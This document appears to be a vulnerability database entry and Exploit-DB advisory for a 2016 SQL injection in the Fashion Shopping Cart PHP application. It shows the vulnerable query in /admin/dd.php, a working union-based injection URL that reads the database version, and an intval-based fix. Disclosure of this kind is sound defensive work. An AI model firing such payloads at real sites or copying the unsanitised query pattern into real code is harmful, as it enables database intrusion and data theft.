Fashion Shopping Cart SQL Injection

vendor:

Fashion Shopping Cart

by:

lahilote

6,5

CVSS

MEDIUM

SQL Injection

CWE

Product Name: Fashion Shopping Cart

Affected Version From: 0.1

Affected Version To: 0.1

Patch Exists: NO

Related CWE: N/A

CPE: a:sourcecodester:fashion_shopping_cart

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Xampp

2016

Fashion Shopping Cart SQL Injection

This vulnerability was discovered when the audit_list in /admin/dd.php was found to be vulnerable to SQL injection. An example exploitation is http://server/path_to_webapp/admin/dd.php?q=-1%27%20union%20select%201,version()--+ which can be used to extract information from the database. The vulnerability can be fixed by using the php function intval.

Mitigation:

Use the php function intval.

Source

Exploit-DB raw data:

# Exploit Title.............. Fashion Shopping Cart SQL Injection
# Google Dork................ N/A
# Date....................... 14/10/2016
# Exploit Author............. lahilote
# Vendor Homepage............ http://www.sourcecodester.com/node/10435
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/aniketsmarty/online_shopping.zip
# Version.................... 0.1
# Tested on.................. xampp
# CVE........................ N/A


The audit_list in /admin/dd.php
-------------------------------

----snip----

$q=$_GET["q"];

$sql="SELECT * FROM subcategory WHERE cat_id ='$q'";

----snip----

Example exploitation
--------------------
http://server/path_to_webapp/admin/dd.php?q=-1%27%20union%20select%201,version()--+


How to fix
----------
Simple method's use the php function intval.
For example

$q=intval($_GET["q"]);

$sql="SELECT * FROM subcategory WHERE cat_id ='$q'";


Credits
-------
This vulnerability was discovered and researched by lahilote

References
----------
http://www.sourcecodester.com/node/10435
http://php.net/manual/en/function.intval.php